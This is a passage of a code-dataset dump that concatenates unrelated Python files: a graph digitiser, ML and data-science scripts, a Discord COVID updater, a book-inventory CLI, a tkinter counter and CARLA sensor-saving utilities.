self.spr += 5\n self.s_ult += 6\n if event.key ==\"down\":\n self.spr -= 5\n self.s_ult += 6\n if event.key ==\"left\":\n self.Eel += 5000\n if event.key ==\"right\":\n self.Eel -= 5000\n if event.key ==\"w\":\n self.spr += 25\n self.s_ult += 30\n if event.key ==\"s\":\n self.spr -= 25\n self.s_ult += 30\n if event.key ==\"a\":\n self.Eel += 25000\n if event.key ==\"d\":\n self.Eel -= 25000\n if event.key ==\"m\":\n self.n += 0.5\n if event.key ==\"n\":\n self.n -= 0.5\n if event.key ==\"k\":\n self.n += 3\n if event.key ==\"j\":\n self.n -= 3\n\n moment, A = moment_graph(shape = self.shape, b = self.b, d = self.d, r = self.r, t_flange = self.t_flange, t_web = self.t_web, c = self.c, Eel = self.Eel, spr = self.spr, n = self.n, v = self.v, k = self.k, last = self.new_points[-1][0], curve_pl=self.curve_pl, s_pl=self.s_pl, s_ult = False)\n \"\"\"\n\n if event.key ==\"up\":\n self.moment = [i * 1.02 for i in self.moment]\n if event.key ==\"down\":\n self.moment = [i / 1.02 for i in self.moment]\n if event.key ==\"left\":\n self.A = [i / 1.02 for i in self.A]\n if event.key ==\"right\":\n self.A = [i * 1.02 for i in self.A]\n if event.key ==\"w\":\n self.moment = [i * 1.2 for i in self.moment]\n if event.key ==\"x\":\n self.moment = [i / 1.2 for i in self.moment]\n if event.key ==\"a\":\n self.A = [i / 1.2 for i in self.A]\n if event.key ==\"d\":\n self.A = [i * 1.2 for i in self.A] \n plt.plot(self.A, self.moment, 'r-', label='Theoretical')\n #dpath = derivative(self.path)\n #ddpath = derivative(dpath)\n x, y = self.new_points[:,0], self.new_points[:,1]\n px, py = self.path[:,0], self.path[:,1]\n #dpx, dpy = dpath[:,0], dpath[:,1]\n #ddpx, ddpy = ddpath[:,0], ddpath[:,1]\n plt.plot(px, py, 'b-', label='Experimental')\n plt.ylabel('Moment / KNm')\n plt.xlabel('Curvature / rad')\n plt.grid(True,'both')\n #plt.plot(dpx, dpy, 'k-')\n #plt.plot(ddpx, ddpy, 'r-')\n plt.plot(x, y, 'yo')\n fig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click2)\n fig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click2)\n plt.legend()\n plt.show()\n\ndef derivative(points):\n devivative = []\n for i in range(len(points)-1):\n g = (points[i+1][1]-points[i][1])/(points[i+1][0]-points[i][0])\n x = (points[i+1][0]+points[i][0])/2\n devivative.append([x,g])\n return np.array(devivative)\n\n# find the a & b points\ndef get_bezier_coef(points):\n # since the formulas work given that we have n+1 points\n # then n must be this:\n n = len(points) - 1\n\n # build coefficents matrix\n C = 4 * np.identity(n)\n np.fill_diagonal(C[1:], 1)\n np.fill_diagonal(C[:, 1:], 1)\n C[0, 0] = 2\n C[n - 1, n - 1] = 7\n C[n - 1, n - 2] = 2\n\n # build points vector\n P = [2 * (2 * points[i] + points[i + 1]) for i in range(n)]\n P[0] = points[0] + 2 * points[1]\n P[n - 1] = 8 * points[n - 1] + points[n]\n\n # solve system, find a & b\n A = np.linalg.solve(C, P)\n B = [0] * n\n for i in range(n - 1):\n B[i] = 2 * points[i + 1] - A[i + 1]\n B[n - 1] = (A[n - 1] + points[n]) / 2\n\n return A, B\n\n# returns the general Bezier cubic formula given 4 control points\ndef get_cubic(a, b, c, d):\n return lambda t: np.power(1 - t, 3) * a + 3 * np.power(1 - t, 2) * t * b + 3 * (1 - t) * np.power(t, 2) * c + np.power(t, 3) * d\n\n# return one cubic curve for each consecutive points\ndef get_bezier_cubic(points):\n A, B = get_bezier_coef(points)\n return [\n get_cubic(points[i], A[i], B[i], points[i + 1])\n for i in range(len(points) - 1)\n ]\n\n# evalute each cubic curve on the range [0, 1] sliced in n points\ndef evaluate_bezier(points, n):\n curves = get_bezier_cubic(points)\n return np.array([fun(t) for fun in curves for t in np.linspace(0, 1, n)])\n\n\n\n \nTHIS_FOLDER = os.path.dirname(os.path.abspath(__file__))\npic = os.path.join(THIS_FOLDER, 'Graphs','4-10-Zhou-Young-RHS.png')\n\nfig, ax = plt.subplots(figsize=(15,9))\nimData = plt.imread(pic)\nimage = Image.open(pic)\nplt.imshow(imData)\ngraph_plotter = Graphplotter(ax, image, scale_point=[0.0012,40], shape = \"RHS\", row_number = (23-1), v = 0.3, k = -0.46)\n\nfig.canvas.mpl_connect('motion_notify_event', graph_plotter.on_mouse_move)\nfig.canvas.mpl_connect('button_press_event', graph_plotter.on_mouse_click)\nfig.canvas.mpl_connect('key_press_event', graph_plotter.on_key_click)\nplt.show()","sub_path":"graph_code.py","file_name":"graph_code.py","file_ext":"py","file_size_in_byte":15114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"579912292","text":"a=int(input())\narr=list(map(int,input().split()))\nc=[]\nfor k in range(0,a):\n for j in range(k+1,a):\n if arr[k]==arr[j]:\n c.append(arr[k])\nif len(c)==0:\n print(\"unique\")\nelse:\n c.sort()\nif(len(set(c))==1):\n print(c[0])\nelse:\n for r in range(0,len(c)):\n print(c[r],end=\" \")\n","sub_path":"printing rpeated number in list.py","file_name":"printing rpeated number in list.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596522556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCS224N 2019-20: Homework 5\n\"\"\"\n\nimport torch\nimport torch.nn as nn\n\n\nclass Highway(nn.Module):\n \"\"\"\n A highway network.\n \"\"\"\n def __init__(self, embed_size):\n \"\"\" Init Highway Layer.\n\n @param embed_size (int): Embedding size for character (dimensionality)\n \"\"\"\n super(Highway, self).__init__()\n self.embed_size = embed_size\n\n self.W_proj = nn.Linear(in_features=embed_size, out_features=embed_size)\n # nn.init.xavier_uniform_(self.W_proj.weight)\n # nn.init.uniform_(self.W_proj.bias)\n\n self.W_gate = nn.Linear(in_features=embed_size, out_features=embed_size)\n # nn.init.xavier_uniform_(self.W_gate.weight)\n # nn.init.uniform_(self.W_gate.bias)\n\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x_conv_out: torch.Tensor) -> torch.Tensor:\n \"\"\" Takes a mini-batch of x_conv_out and returns a tensor corresponding to highway operation output.\n\n @param x_conv_out (torch.Tensor): Tensor returned from convolutional network of shape (embed_size, ).\n\n @returns x_highway (torch.Tensor): A tensor of shape (embed_size, ) representing output of highway network.\n \"\"\"\n x_proj = self.relu(self.W_proj(x_conv_out))\n x_gate = self.sigmoid(self.W_gate(x_conv_out))\n x_highway = x_gate * x_proj + (1-x_gate) * x_conv_out\n return x_highway\n","sub_path":"a5/highway.py","file_name":"highway.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228528362","text":"from BaseObjects import BaseEDAPage\nfrom EDA import eda_lex_locators\nfrom cumulusci.robotframework.pageobjects import BasePage\nfrom cumulusci.robotframework.pageobjects import pageobject\nimport time\n\n@pageobject(\"Courses\", \"HEDA_Settings\")\nclass CoursesSettingsPage(BaseEDAPage, BasePage):\n\n def _is_current_page(self):\n \"\"\"\n Verify we are on the EDA Settings page for Courses\n by verifying the HEDA Settings URL and the Courses tab\n \"\"\"\n location = \"/lightning/n/{}{}\".format(self.eda.get_eda_namespace_prefix(), self._object_name)\n self.selenium.location_should_contain(location)\n\n locator_tab = eda_lex_locators[\"eda_settings\"][\"tab\"].format(\"Courses\")\n self.selenium.wait_until_page_contains_element(\n locator_tab,\n error=f\"Courses tab with locator '{locator_tab}' is not available on the page\"\n )\n\n def verify_text_appears(self, textMessage):\n \"\"\" Verify the text message is displayed\n this message gets displayed when the 'Run copy' button is clicked\n in both read and edit mode\n \"\"\"\n time.sleep(0.5) #No other element to wait until this page loads so using sleep\n locator = eda_lex_locators[\"eda_settings_courses\"][\"text_message\"].format(textMessage)\n self.selenium.wait_until_page_contains_element(locator,\n error=\"Run copy text is not displayed\")\n text = self.selenium.get_webelement(locator).get_attribute(\"className\")\n if \"slds-hide\" in text:\n raise Exception(f\"The text message {textMessage} is not displayed\")","sub_path":"robot/EDA/resources/CoursesSettingsPageObject.py","file_name":"CoursesSettingsPageObject.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45320646","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nSamuel Niang\nFor IPNL (Nuclear Physics Institue of Lyon)\n\"\"\"\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom tools import importPickle\nfrom matplotlib import ticker, cm\n\nfilename = 'charged_hadrons_100k.energydata'\ndata = importPickle(filename)\nfilename = 'prod2_200_400k.energydata'\ndata = data.mergeWith(importPickle(filename))\n\n#on sépare data en 2\ndata1,data2 = data.splitInTwo()\n\nloc = ticker.LinearLocator(10)\nfor nbLego in np.linspace(10,180,18):\n nbLego = int(nbLego)\n #On utilise data1 pour établir un modèle de calibration\n cal = data1.calibrationLego(nbLego,True)\n x = np.linspace(cal.ecal.min(), cal.ecal.max(),cal.nbLego)\n y = np.linspace(cal.hcal.min(), cal.hcal.max(),cal.nbLego)\n X, Y = np.meshgrid(x,y)\n Z = cal.getPrecision(X,Y)\n \n fig = plt.figure(1,figsize=(10, 7))\n plt.title(r\"$\\Delta\\overline{true}/\\overline{true}$ par bin,$n_{Lego} = \"+str(nbLego)+\"$\",fontsize=20)\n plt.xlabel(r\"$E_{cal}$\",fontsize=20)\n plt.ylabel(r\"$H_{cal}$\",fontsize=20)\n cs = plt.contourf(X,Y,Z, locator=loc, cmap=cm.hot)\n cbar = fig.colorbar(cs)\n plt.show()\n fig.savefig('pictures/CalibrationLegoTest5/CalibrationLegoTest5_'+str(nbLego)+'.eps')\n \n\nplt.close()","sub_path":"lego_calibration5.py","file_name":"lego_calibration5.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"359843828","text":"print(__doc__)\n\nimport os\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef main():\n print('参数个数为:', len(sys.argv), '个参数。')\n print('参数列表:', str(sys.argv))\n print('脚本名为:', sys.argv[0])\n for i in range(1, len(sys.argv)):\n print('参数 %s 为:%s' % (i, sys.argv[i]))\n dict = createDict(sys.argv)\n createDataSet(dict)\n\n\ndef createDict(args):\n dict = {};\n dict['penalty'] = args[1];\n dict['dual'] = False;\n if args[2] == 'True':\n dict['dual'] = True\n print(dict)\n dict['tol'] = float(args[3]);\n dict['C'] = float(args[4]);\n dict['fit_intercept'] = False\n if args[5] == 'True':\n dict['fit_intercept'] = True\n dict['intercept_scaling'] = int(args[6]);\n if args[7] == 'None':\n args[7] = None\n dict['class_weight'] = args[7];\n if args[8] == 'None':\n args[8] = None\n dict['random_state'] = args[8];\n dict['solver'] = args[9];\n dict['max_iter'] = int(args[10]);\n dict['multi_class'] = args[11];\n dict['verbose'] = int(args[12]);\n dict['warm_start'] = False;\n if args[13] == 'True':\n dict['warm_start'] = True\n if args[14] == 'None':\n args[14] = None\n dict['n_jobs'] = args[14];\n if args[15] == 'None':\n args[15] = None\n dict['l1_ratio'] = args[15];\n dict['dimension'] = int(args[16]);\n dict['in_file_path'] = args[17];\n dict['out_file_path'] = args[18];\n return dict\n\n\ndef createDataSet(dict):\n dataset = pd.read_csv(dict['in_file_path']) # usecols = [3,4]\n header = dataset.columns.values;\n length = len(header)\n dimension = dict['dimension']\n\n list = []\n for i in range(length - dimension - 1, length - 1):\n list.append(i)\n X = dataset.iloc[:, list].values\n scla = StandardScaler()\n X = scla.fit_transform(X)\n if (dimension > 2):\n X = PCA(n_components=2).fit_transform(X)\n Y0 = dataset.iloc[:, [length - 1]].values\n Y = []\n for i in range(0, len(Y0)):\n Y.append(Y0[i][0])\n Y = np.array(Y)\n print(Y)\n\n clf = LogisticRegression(penalty=dict['penalty'],\n dual=dict['dual'],\n tol=dict['tol'],\n C=dict['C'],\n fit_intercept=dict['fit_intercept'],\n intercept_scaling=dict['intercept_scaling'],\n class_weight=dict['class_weight'],\n random_state=dict['random_state'],\n solver=dict['solver'],\n max_iter=dict['max_iter'],\n multi_class=dict['multi_class'],\n verbose=dict['verbose'],\n warm_start=dict['warm_start'],\n n_jobs=dict['n_jobs'],\n l1_ratio=dict['l1_ratio']\n )\n clf.fit(X, Y)\n # print the training scores\n print(\"training score : %.3f \" % (clf.score(X, Y)))\n\n model_path = dict['out_file_path']\n model_parent_path = os.path.split(model_path)[0]\n if not os.path.exists(model_parent_path):\n os.makedirs(model_parent_path)\n joblib.dump(clf, model_path)\n\n # create a mesh to plot in\n h = .02 # step size in the mesh\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n # Plot the decision boundary. For that, we will assign a color to each\n # point in the mesh [x_min, x_max]x[y_min, y_max].\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.figure()\n plt.contourf(xx, yy, Z, cmap=plt.cm.Paired)\n plt.title(\"Decision surface of LogisticRegression (%s)\")\n plt.axis('tight')\n\n # Plot also the training points\n for i in zip(clf.classes_):\n idx = np.where(Y == i)\n plt.scatter(X[idx, 0], X[idx, 1], cmap=plt.cm.Paired,\n edgecolor='black', s=20)\n\n png_path = os.path.splitext(model_path)[0] + \".png\"\n plt.savefig(png_path)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"nm/Logistic/Logistic_train.py","file_name":"Logistic_train.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124844549","text":"import asyncio\nimport logging\nimport pandas as pd\n\nfrom gateways.bno_news_gateway import BnoNewsGatewayError\nfrom utils.data import remove_non_integers_from_string\n\nfrom texttable import Texttable\n\n\nclass UpdaterService:\n def __init__(\n self, bno_news_gateway, data_parser_service, region, update_interval, discord_channel_id, output, logger=None,\n ):\n self.bno_news_gateway = bno_news_gateway\n self.data_parser_service = data_parser_service\n self.region = region\n self.update_interval = update_interval\n self.discord_channel_id = discord_channel_id\n self.output = output\n self.previous_data = pd.DataFrame\n self.logger = logger if logger else logging.getLogger(__name__)\n\n async def update_loop(self, discord_client):\n self.logger.info(\"Coronavirus Updater Initialised\")\n\n while not discord_client.is_closed():\n self.logger.info(\"Fetching the latest Coronavirus statistics\")\n\n try:\n latest_data = self.bno_news_gateway.fetch_raw()\n except BnoNewsGatewayError as bnge:\n self.logger.critical(f\"Failed to fetch the latest virus data - {str(bnge)}\")\n self.logger.info(\"Trying again in 60 seconds...\")\n await asyncio.sleep(60)\n continue\n\n self.logger.debug(\"Data fetched successfully. Parsing...\")\n\n if self.region in [\"china\", \"international\"]:\n data = self.data_parser_service.create_dataframe_from_bno_data(latest_data, self.region)\n else:\n china_data = self.data_parser_service.create_dataframe_from_bno_data(latest_data, \"china\")\n international_data = self.data_parser_service.create_dataframe_from_bno_data(\n latest_data, \"international\"\n )\n\n data = china_data.append(international_data, ignore_index=True)\n\n self.logger.debug(\"Data parsed successfully\")\n\n if not self.previous_data.empty:\n self.logger.debug(\"Checking against previous data\")\n\n data_diff = pd.concat([self.previous_data, data]).drop_duplicates(keep=False)\n\n if not data_diff.empty:\n self.logger.debug(\"Data has changed. Creating and sending messages\")\n update_messages = self._make_update_message(data_diff)\n\n for update in update_messages:\n await discord_client.get_channel(self.discord_channel_id).send(update)\n else:\n self.logger.debug(\"No changes in data - sleeping\")\n else:\n self.logger.info(\"Previous data is empty - not comparing. Updating values\")\n\n self.previous_data = data\n\n await asyncio.sleep(self.update_interval)\n\n def _make_update_message(self, data):\n if self.output == \"table\":\n return self._make_table_update(data)\n else:\n return self._make_text_update(data)\n\n def _make_table_update(self, data):\n table = Texttable()\n\n table.set_cols_align([\"c\"] * len(data.columns))\n table.set_cols_valign([\"m\"] * len(data.columns))\n\n parsed_data = self._collect_differences(data)\n\n new_data = [data.columns.tolist()]\n\n for index, row in parsed_data.iterrows():\n (location, cases_before, cases_after, deaths_before, deaths_after, notes,) = row\n\n cases_diff = int(cases_after) - int(cases_before)\n deaths_diff = int(deaths_after) - int(deaths_before)\n\n if cases_diff > 0:\n cases = \"\".join([cases_after, \" (+\", str(cases_diff), \")\"])\n elif cases_diff < 0:\n cases = \"\".join([cases_after, \" (\", str(cases_diff), \")\"])\n else:\n cases = cases_after\n\n if deaths_diff > 0:\n deaths = \"\".join([deaths_after, \" (+\", str(deaths_diff), \")\"])\n elif deaths_diff < 0:\n deaths = \"\".join([deaths_after, \" (\", str(deaths_diff), \")\"])\n else:\n deaths = deaths_after\n\n # TODO: Fix the new columns that were added in with issue #3\n new_data.append([location, cases, deaths, \"0\", \"0\", \"0\", notes])\n\n table.add_rows(new_data)\n\n message_cache = []\n all_messages = []\n\n table_split = table.draw().split(\"\\n\")\n\n while table_split:\n message = table_split.pop(0) + \"\\n\"\n message_cache.append([message])\n\n total_message = \"\".join(m[0] for m in message_cache)\n\n if len(total_message) > 1700 or not table_split:\n all_messages.append(f\"```{total_message[:-1]}```\")\n message_cache = []\n\n return all_messages\n\n def _make_text_update(self, data):\n TEXT_TEMPLATE = {\n \"cases_up\": \"{count} new case(s) identified in **{location}**, total case(s) now are {current}\",\n \"cases_down\": \"{count} incorrectly identified case(s) in **{location}**, total case(s) now are {current}\",\n \"deaths_up\": \"{count} new death(s) recorded in **{location}**, total death(s) now are {current}\",\n \"deaths_down\": \"{count} incorrectly identified death(s) in **{location}**, total death(s) now are {current}\",\n }\n\n parsed_data = self._collect_differences(data)\n\n message_store = []\n\n for index, row in parsed_data.iterrows():\n (location, cases_before, cases_after, deaths_before, deaths_after, notes,) = row\n\n cases_diff = int(cases_after) - int(cases_before)\n deaths_diff = int(deaths_after) - int(deaths_before)\n\n if cases_diff > 0:\n message_store.append(\n TEXT_TEMPLATE[\"cases_up\"].format(count=cases_diff, location=location, current=cases_after,)\n ),\n elif cases_diff < 0:\n message_store.append(\n TEXT_TEMPLATE[\"cases_down\"].format(count=abs(cases_diff), location=location, current=cases_after,)\n ),\n\n if deaths_diff > 0:\n message_store.append(\n TEXT_TEMPLATE[\"deaths_up\"].format(count=deaths_diff, location=location, current=deaths_after,)\n ),\n elif deaths_diff < 0:\n message_store.append(\n TEXT_TEMPLATE[\"deaths_down\"].format(\n count=abs(deaths_diff), location=location, current=deaths_after,\n )\n ),\n\n message_cache = []\n all_messages = []\n\n while message_store:\n message = message_store.pop(0) + \"\\n\"\n message_cache.append([message])\n\n total_message = \"\".join(m[0] for m in message_cache)\n\n if len(total_message) > 1700 or not message_store:\n all_messages.append(total_message[:-1])\n message_cache = []\n\n return all_messages\n\n def _collect_differences(self, data):\n columns = [\n \"location\",\n \"cases_before\",\n \"cases_after\",\n \"deaths_before\",\n \"deaths_after\",\n \"notes\",\n ]\n parsed_data = []\n changed_locations = data.Location.unique()\n\n for location in changed_locations:\n location_data = data.loc[data[\"Location\"] == location]\n\n if len(location_data) == 1:\n cases_before = \"0\"\n deaths_before = \"0\"\n else:\n cases_before = remove_non_integers_from_string(location_data.iloc[0][\"Cases\"])\n deaths_before = remove_non_integers_from_string(location_data.iloc[0][\"Deaths\"])\n\n cases_after = remove_non_integers_from_string(location_data.iloc[-1][\"Cases\"])\n deaths_after = remove_non_integers_from_string(location_data.iloc[-1][\"Deaths\"])\n\n notes = location_data.iloc[-1][\"Notes\"]\n\n parsed_data.append(\n [location, cases_before, cases_after, deaths_before, deaths_after, notes,]\n )\n\n return pd.DataFrame(parsed_data, columns=columns)\n","sub_path":"services/updater_service.py","file_name":"updater_service.py","file_ext":"py","file_size_in_byte":8173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"95781163","text":"# Tests for ResponseParser class\n#\n#\n\nfrom HttpClient import HttpClient\nfrom ResponseParser import ResponseParser\n\n\ntestUrl = \"https://10minutemail.net/\"\n\ntestClient = HttpClient()\ntestParser = ResponseParser()\n\n# testResponse = testClient.initialRequest(testUrl)\n# cookie = testParser.getCookies(testResponse)\ncookie = {\"PHPSESSID\":\"e2ee08ec196ed786ada381722fd1b5a5\"}\ntestResponse = testClient.sendRequest(testUrl, cookie)\nlinks = testParser.getInboxLinks(testResponse)\n\nfor link in links:\n code = testParser.getTwitterCode(\n testClient.sendRequest(testUrl + link, cookie))\n print(code)\n\n\n# Test getFakeAccData method\n# print( testParser.getFakeAccData(testResponse))\n\n# Test getInboxLinks method\n# print( testParser.getInboxLinks(testResponse))\n\n# Test ... method\n# print()\n","sub_path":"Parser/Test/ParserTest.py","file_name":"ParserTest.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76208603","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 15 17:39:05 2021\r\n\r\n@author: ania\r\n\"\"\"\r\nimport pandas as pd\r\n\r\ndef Komunikat(tekst):\r\n input(tekst+\"\\n\\nWCIŚNIJ ENTER ŻEBY KONTYNUOWAĆ\")\r\n\r\ndef WczytajDane():\r\n data = pd.read_excel('MagazynKsiazek.xlsx',\"Sheet1\", index_col=0)\r\n data = pd.DataFrame(data)\r\n return data\r\n\r\ndef PokazPozycje(data):\r\n ilosc_pozycji=len(data)\r\n if(ilosc_pozycji<1):\r\n Komunikat(\"Brak ksiązek w magazynie!\")\r\n else:\r\n print(data)\r\n print(\"\")\r\n \r\ndef DodajPozycje(data):\r\n print(\"Podaj dane:\")\r\n tytul=input(\"Tytuł: \")\r\n autor=input(\"Autor: \")\r\n wydawnictwo=input(\"Wydawnictwo: \")\r\n ilosc_stron=input(\"Ilość stron: \")\r\n rok_wydania=input(\"Rok wydania: \")\r\n new_row={'Tytuł':tytul,'Autor':autor,'Wydawnictwo': wydawnictwo,'Ilość stron':ilosc_stron,'Rok wydania':rok_wydania}\r\n data=data.append(new_row,ignore_index=True)\r\n try: \r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie dodano ksiązkę\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n\r\n\r\ndef UsunPozycje(data):\r\n PokazPozycje(data)\r\n wybor=input(\"Podaj id ksiązki którą chcesz usunąć: \")\r\n wybor1=input(\"Czy na pewno chcesz usunąć książkę o ID=\"+wybor+\" Wpisz t lub n: \")\r\n if(wybor1==\"t\"):\r\n data=data.drop([int(wybor)])\r\n data=data.reset_index(drop=True)\r\n try: \r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie usunięto ksiązkę!\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n \r\n else:\r\n Komunikat(\"Nie usunięto ksiązki!\")\r\n\r\ndef EdytujPozycje(data):\r\n PokazPozycje(data)\r\n wybor=input(\"Podaj id ksiązki którą chcesz zedytować: \")\r\n print(\"Podaj nowe dane:\")\r\n tytul=input(\"Tytuł: \")\r\n autor=input(\"Autor: \")\r\n wydawnictwo=input(\"Wydawnictwo: \")\r\n ilosc_stron=input(\"Ilość stron: \")\r\n rok_wydania=input(\"Rok wydania: \")\r\n data.loc[int(wybor),'Tytuł']=tytul\r\n data.loc[int(wybor),'Autor']=autor\r\n data.loc[int(wybor),'Wydawnictwo']=wydawnictwo\r\n data.loc[int(wybor),'Ilość stron']=ilosc_stron\r\n data.loc[int(wybor),'Rok wydania']=rok_wydania\r\n wybor1=input(\"Czy na pewno chcesz zedytować wybraną pozycję? Wpisz t lub n: \")\r\n if(wybor1==\"t\"):\r\n try:\r\n data.to_excel(\"MagazynKsiazek.xlsx\")\r\n Komunikat(\"Pomyslnie zedytowano pozycję!\")\r\n except:\r\n Komunikat(\"ZAMKNIJ DOKUMENT A NASTĘPNIE POWTÓRZ ZADANIE!\")\r\n else:\r\n Komunikat(\"Anulowano edytowanie pozycji!\")\r\n\r\ndef Menu():\r\n print(\"1. Dodaj pozycję\\n2. Usuń pozycję\\n3. Pokaż wszystkie pozycje\\n4. Edytuj pozycję\\n5. Wyjdź z programu\")\r\n\r\n\r\nwhile 1:\r\n Menu()\r\n wybor=input(\"Wybierz: \")\r\n if(wybor == \"1\"):\r\n dane=WczytajDane()\r\n DodajPozycje(dane)\r\n elif(wybor==\"2\"):\r\n dane=WczytajDane()\r\n UsunPozycje(dane)\r\n elif(wybor == \"3\"):\r\n dane=WczytajDane()\r\n PokazPozycje(dane)\r\n elif(wybor==\"4\"):\r\n dane=WczytajDane()\r\n EdytujPozycje(dane)\r\n elif(wybor==\"5\"):\r\n input(\"Wcisnij \\\"enter\\\" żeby kontynuować\")\r\n break\r\n else:\r\n print(\"Zły wybór!\")\r\n","sub_path":"EdytaZylinskaInformatyka/Biblioteka_projekt.py","file_name":"Biblioteka_projekt.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"490534604","text":"monIntRate = annualInterestRate / 12\nupdBalance = balance\nmonLowBound = updBalance / 12\nmonUppBound = (updBalance * (1 + monIntRate) ** 12) / 12\n\nwhile round(updBalance, 2) != 0:\n updBalance = balance\n monFixPay = (monLowBound + monUppBound) / 2\n for i in range(12):\n monUnpBal = updBalance - monFixPay\n updBalance = monUnpBal + monIntRate * monUnpBal\n if updBalance > 0:\n monLowBound = monFixPay\n elif updBalance < 0:\n monUppBound = monFixPay\n\nprint(\"Lowest Payment:\", round(monFixPay, 2))","sub_path":"Week 2/Problem Set 2/Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"285024579","text":"from tkinter import *\n\nn=int(0)\n\ndef slt():\n global n\n n+=1\n lab1.config(text=n) \n\ndef slt2():\n global n\n n-=1\n lab1.config(text=n)\n\nwindow=Tk()\nwindow.title(\"windo1\")\nwindow.geometry(\"555x555+100+100\")\nwindow.config(bg=\"#6677ff\")\n\nlab1=Label(window,text=n,width=12,height=3,bg=\"#555500\")\nlab1.pack()#打包\n\nbtn1=Button(window,text=\"add\",command=slt,bg=\"#00AA00\")\nbtn1.pack()\nbtn2=Button(window,text=\"sub\",command=slt2)\nbtn2.pack()\n\nbtnexit=Button(window,text=\"exit\",command=window.destroy)\nbtnexit.pack()\n\nwindow.mainloop()","sub_path":"a1.py","file_name":"a1.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"416126213","text":"import os\nimport json\nimport shutil\n\nfrom google.protobuf.json_format import MessageToJson, MessageToDict\nfrom PIL import Image as PImage\n\ndef write_image_data(data, filename, format,\n top_crop, bottom_crop, resize_width, resize_height):\n\n image = PImage.frombytes(mode='RGBA',\n size=(data.width, data.height),\n data=data.raw_data,\n decoder_name='raw')\n color = image.split()\n image = PImage.merge(\"RGB\", color[2::-1])\n width, height = image.size\n \n if not (width == resize_width and height == resize_height):\n image = image.crop( (0, top_crop, width, height - bottom_crop) )\n image = image.resize( (resize_width, resize_height) )\n\n if not filename.endswith(format):\n filename += format\n \n folder = os.path.dirname(filename)\n if not os.path.isdir(folder):\n os.makedirs(folder)\n image.save(filename, quality=100)\n\n\ndef write_lidar_data(data, filename, format):\n\n if not filename.endswith(format):\n filename += format\n\n point_cloud = data.point_cloud\n\n def construct_ply_header():\n \"\"\"Generates a PLY header given a total number of 3D points and\n coloring property if specified\n \"\"\"\n points = len(point_cloud) # Total point number\n header = ['ply',\n 'format ascii 1.0',\n 'element vertex {}',\n 'property float32 x',\n 'property float32 y',\n 'property float32 z',\n 'property uchar diffuse_red',\n 'property uchar diffuse_green',\n 'property uchar diffuse_blue',\n 'end_header']\n if not point_cloud._has_colors:\n return '\\n'.join(header[0:6] + [header[-1]]).format(points)\n return '\\n'.join(header).format(points)\n\n if not point_cloud._has_colors:\n ply = '\\n'.join(['{:.2f} {:.2f} {:.2f}'.format(\n *p) for p in point_cloud._array.tolist()])\n else:\n points_3d = numpy.concatenate(\n (point_cloud._array, point_cloud._color_array), axis=1)\n ply = '\\n'.join(['{:.2f} {:.2f} {:.2f} {:.0f} {:.0f} {:.0f}'\n .format(*p) for p in points_3d.tolist()])\n\n # Create folder to save if does not exist.\n folder = os.path.dirname(filename)\n if not os.path.isdir(folder):\n os.makedirs(folder)\n\n # Open the file and save with the specific PLY format.\n with open(filename, 'w+') as ply_file:\n ply_file.write('\\n'.join([construct_ply_header(), ply]))\n\n\ndef write_json_measurements(episode_path, data_point_id, measurements, control, control_noise,\n state):\n\n with open(os.path.join(episode_path, 'measurements_' + data_point_id.zfill(5) + '.json'), 'w') as fo:\n\n jsonObj = MessageToDict(measurements)\n jsonObj.update(state)\n jsonObj.update({'steer': control.steer})\n jsonObj.update({'throttle': control.throttle})\n jsonObj.update({'brake': control.brake})\n jsonObj.update({'hand_brake': control.hand_brake})\n jsonObj.update({'reverse': 